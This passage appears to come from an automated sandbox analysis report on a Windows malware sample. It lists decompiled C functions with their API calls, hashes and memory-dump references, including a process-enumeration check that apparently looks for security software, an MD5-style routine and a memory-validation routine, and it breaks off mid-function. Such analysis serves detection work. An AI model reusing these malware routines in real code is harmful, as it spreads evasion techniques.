                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E8997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E89C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E89FB
                                                          • HeapFree.KERNEL32(00000000,%]^,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008,?,005E5D25), ref: 005E8AF2
                                                          • HeapFree.KERNEL32(00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008,?,005E5D25), ref: 005E8B05
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: %]^
                                                          • API String ID: 3298025750-1107362547
                                                          • Opcode ID: 3311b09d6926ad5e46d0e50ae5356d5b54770c39f88e23de9cbd804199e9cb6f
                                                          • Instruction ID: c2da91b06033bff2838765b36c07a6972753b5bde4a4baef8c3b8752bba5ae47
                                                          • Opcode Fuzzy Hash: 3311b09d6926ad5e46d0e50ae5356d5b54770c39f88e23de9cbd804199e9cb6f
                                                          • Instruction Fuzzy Hash: D6719E75E001C5AEC71CEBBA8DC897B7FFDFB983407280822E5C9DB111EA31D9499621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005EA65C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E005EA65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x5ed2a8; // 0x107a5a8
						_t2 = _t9 + 0x5eee34; // 0x73617661
						_push( &_v264);
						if( *0x5ed0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                          0x005ea667
                                                          0x005ea671
                                                          0x005ea675
                                                          0x005ea67f
                                                          0x005ea6b0
                                                          0x005ea686
                                                          0x005ea68b
                                                          0x005ea698
                                                          0x005ea6a1
                                                          0x005ea6b8
                                                          0x005ea6a3
                                                          0x005ea6ab
                                                          0x00000000
                                                          0x005ea6ab
                                                          0x005ea6b9
                                                          0x005ea6ba
                                                          0x00000000
                                                          0x005ea6ba
                                                          0x00000000
                                                          0x005ea6b4
                                                          0x005ea6c0
                                                          0x005ea6c5

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005EA66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 005EA67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 005EA6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 005EA6BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID: `7^
                                                          • API String ID: 420147892-2873282293
                                                          • Opcode ID: 5edd9baaecdf9db8b702d4118425098a9b3a2de0a99113fb0f1fd82b5b6098a3
                                                          • Instruction ID: 829943daf88d42aaa2a3f8269d9f227edf930dca6c9b48adea0e60d6ea40cc1b
                                                          • Opcode Fuzzy Hash: 5edd9baaecdf9db8b702d4118425098a9b3a2de0a99113fb0f1fd82b5b6098a3
                                                          • Instruction Fuzzy Hash: 20F0F6369011A56AD728A7739C8DDEB7E6DFBC6310F0501A1F9C5C2000EA30DE498AB6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001F0E, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E10001F0E() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x10004130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1000413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x1000412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x10004128 = _t5;
						 *0x10004130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x10004124 = _t6;
						if(_t6 == 0) {
							 *0x10004124 =  *0x10004124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                          0x10001f0f
                                                          0x10001f1d
                                                          0x10001f23
                                                          0x10001f2a
                                                          0x10001f81
                                                          0x10001f81
                                                          0x10001f2c
                                                          0x10001f34
                                                          0x10001f41
                                                          0x10001f41
                                                          0x10001f7d
                                                          0x10001f7f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10001f36
                                                          0x10001f3d
                                                          0x10001f43
                                                          0x10001f43
                                                          0x10001f48
                                                          0x10001f56
                                                          0x10001f5b
                                                          0x10001f61
                                                          0x10001f67
                                                          0x10001f6e
                                                          0x10001f70
                                                          0x10001f70
                                                          0x10001f7a
                                                          0x10001f3f
                                                          0x10001f3f
                                                          0x00000000
                                                          0x10001f3f
                                                          0x10001f3d

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001462,74B063F0), ref: 10001F1D
                                                          • GetVersion.KERNEL32 ref: 10001F2C
                                                          • GetCurrentProcessId.KERNEL32 ref: 10001F48
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$CreateCurrentEventOpenVersion
                                                          • String ID:
                                                          • API String ID: 845504543-0
                                                          • Opcode ID: 6b78b0ba66763b1fda00833f905b6321ffd1b1deaffe8dbc06cc9ba591ad23f3
                                                          • Instruction ID: 81d6f718ae41dea5634b5d6ac1f0cee9f6b854f783bc08cc4c4759fd43992b84
                                                          • Opcode Fuzzy Hash: 6b78b0ba66763b1fda00833f905b6321ffd1b1deaffe8dbc06cc9ba591ad23f3
                                                          • Instruction Fuzzy Hash: 50F0AFB06453329BF7019F68ADA97D63BE4E7097D2F024125F641C61ECDBB095828B4C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003D04AF, Relevance: 2.9, Strings: 2, Instructions: 351COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c$t32c
                                                          • API String ID: 0-1046649395
                                                          • Opcode ID: 6f17e09b1427cf78a8ed9a689b0777dcdb68ec0f21dac24231d75f354118b123
                                                          • Instruction ID: 6af7748328e4f343c27864947f53148f2f00108cd300ff6e3c6b3ea58bd93dcf
                                                          • Opcode Fuzzy Hash: 6f17e09b1427cf78a8ed9a689b0777dcdb68ec0f21dac24231d75f354118b123
                                                          • Instruction Fuzzy Hash: 44D1153290011AEFDF29DB90DD88BAEB7B5FB88710F1542D6D909A7621D330AE95DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E3EE1, Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 49%
                                                          			E005E3EE1(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                                          0x005e3ee4
                                                          0x005e3eef
                                                          0x005e3ef2
                                                          0x005e3ef5
                                                          0x005e3ef6
                                                          0x005e3f14
                                                          0x005e3f16
                                                          0x005e3f19
                                                          0x005e3f1c
                                                          0x005e3f1c
                                                          0x005e3f1f
                                                          0x005e3f1f
                                                          0x005e3f22
                                                          0x005e3f22
                                                          0x005e3f25
                                                          0x005e3f25
                                                          0x005e3f42
                                                          0x005e3f45
                                                          0x005e3f5b
                                                          0x005e3f5e
                                                          0x005e3f78
                                                          0x005e3f7b
                                                          0x005e3f91
                                                          0x005e3f94
                                                          0x005e3f96
                                                          0x005e3fae
                                                          0x005e3fb1
                                                          0x005e3fb4
                                                          0x005e3fcc
                                                          0x005e3fcf
                                                          0x005e3fe9
                                                          0x005e3fec
                                                          0x005e4002
                                                          0x005e4005
                                                          0x005e4007
                                                          0x005e401f
                                                          0x005e4024
                                                          0x005e4027
                                                          0x005e403d
                                                          0x005e4040
                                                          0x005e405a
                                                          0x005e405d
                                                          0x005e4073
                                                          0x005e4076
                                                          0x005e4078
                                                          0x005e4093
                                                          0x005e4096
                                                          0x005e40ad
                                                          0x005e40b0
                                                          0x005e40b4
                                                          0x005e40cd
                                                          0x005e40d0
                                                          0x005e40d2
                                                          0x005e40d5
                                                          0x005e40f0
                                                          0x005e40f3
                                                          0x005e410c
                                                          0x005e410f
                                                          0x005e411f
                                                          0x005e4122
                                                          0x005e413a
                                                          0x005e413d
                                                          0x005e4157
                                                          0x005e415a
                                                          0x005e4172
                                                          0x005e4175
                                                          0x005e418b
                                                          0x005e418e
                                                          0x005e41a6
                                                          0x005e41a9
                                                          0x005e41c1
                                                          0x005e41c4
                                                          0x005e41de
                                                          0x005e41e1
                                                          0x005e41f7
                                                          0x005e41fa
                                                          0x005e4212
                                                          0x005e4215
                                                          0x005e422f
                                                          0x005e4232
                                                          0x005e424a
                                                          0x005e424d
                                                          0x005e4263
                                                          0x005e4266
                                                          0x005e427e
                                                          0x005e4281
                                                          0x005e4299
                                                          0x005e429c
                                                          0x005e42ae
                                                          0x005e42b1
                                                          0x005e42c3
                                                          0x005e42c6
                                                          0x005e42d8
                                                          0x005e42db
                                                          0x005e42df
                                                          0x005e42ef
                                                          0x005e42f2
                                                          0x005e4300
                                                          0x005e4303
                                                          0x005e4315
                                                          0x005e4318
                                                          0x005e432c
                                                          0x005e432f
                                                          0x005e4331
                                                          0x005e4341
                                                          0x005e4344
                                                          0x005e4356
                                                          0x005e4359
                                                          0x005e4367
                                                          0x005e436a
                                                          0x005e437c
                                                          0x005e437f
                                                          0x005e4383
                                                          0x005e4393
                                                          0x005e4396
                                                          0x005e43a8
                                                          0x005e43ab
                                                          0x005e43b9
                                                          0x005e43bc
                                                          0x005e43ce
                                                          0x005e43d1
                                                          0x005e43e3
                                                          0x005e43e6
                                                          0x005e43fa
                                                          0x005e43fd
                                                          0x005e4411
                                                          0x005e4414
                                                          0x005e4428
                                                          0x005e442b
                                                          0x005e443f
                                                          0x005e4442
                                                          0x005e4456
                                                          0x005e4459
                                                          0x005e446d
                                                          0x005e4472
                                                          0x005e4484
                                                          0x005e4487
                                                          0x005e449b
                                                          0x005e449e
                                                          0x005e44b2
                                                          0x005e44b5
                                                          0x005e44cb
                                                          0x005e44ce
                                                          0x005e44e2
                                                          0x005e44e5
                                                          0x005e44f7
                                                          0x005e44fa
                                                          0x005e450e
                                                          0x005e4511
                                                          0x005e4525
                                                          0x005e4528
                                                          0x005e453c
                                                          0x005e4545
                                                          0x005e4548
                                                          0x005e4551
                                                          0x005e455a
                                                          0x005e4562
                                                          0x005e456a
                                                          0x005e4574
                                                          0x005e4589

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 5864f7f053b59604e316aa71edbfeb0c2904e5abfb6a348cfb0d8265a6a32ea9
                                                          • Instruction ID: a6b1c67b297951171fb0934eee39aa618fd264c425d8cac8957dcfd550bd45d0
                                                          • Opcode Fuzzy Hash: 5864f7f053b59604e316aa71edbfeb0c2904e5abfb6a348cfb0d8265a6a32ea9
                                                          • Instruction Fuzzy Hash: DE22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 100023A5, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E100023A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10004178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100041c0 = 1;
										__eflags =  *0x100041c0;
										if( *0x100041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x10004178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10004178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1000417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
